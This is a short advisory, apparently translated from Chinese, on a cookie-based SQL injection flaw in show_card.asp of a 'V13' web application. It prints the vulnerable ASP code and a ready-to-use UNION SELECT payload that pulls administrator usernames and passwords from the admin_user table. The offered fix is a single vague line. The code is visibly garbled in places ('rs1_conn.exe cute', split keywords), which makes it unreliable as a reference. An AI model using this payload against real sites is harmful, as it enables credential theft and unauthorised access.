Many Injection Vulnerabilities and fixes in the official V13 version

Author: wandering

Affected Version: V13
Http://www.hs173.cn

Vulnerability Type: SQL Injection
Vulnerability Description: The program only defends against get and post injection, so we can use cookie injection to get the Administrator's username and password.

Vulnerability files: show_card.asp and multiple other files

FROM: http://www.st999.cn/blog
<% Id = trim (request ("id "))
If id = "" then
Response. Redirect ("default. asp ")
Response. End ()
End if
Set rs1_conn.exe cute ("select * from card where id =" & id)
If rs. eof then
Response. Write "the card does not exist"
Response. End ()
End if
User_name = rs ("add_user ")
Set c11_conn.exe cute ("select * from card_class where id =" & rs ("class_1 "))
If not c1.eof then
C1c1_name = c1 ("name ")
Card_img = c1 ("card_img ")
Card_url = c1 ("card_url ")
End if
%>


The id here is directly substituted into the query, and the program only defends against get and post injection. Then we can use cookie injection to obtain the administrator username and password.

Exp:

And 1 = 2 union select 1, 2, 3, admin, 5, 6, password, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 from admin_user

Fix:

Filter cookie Injection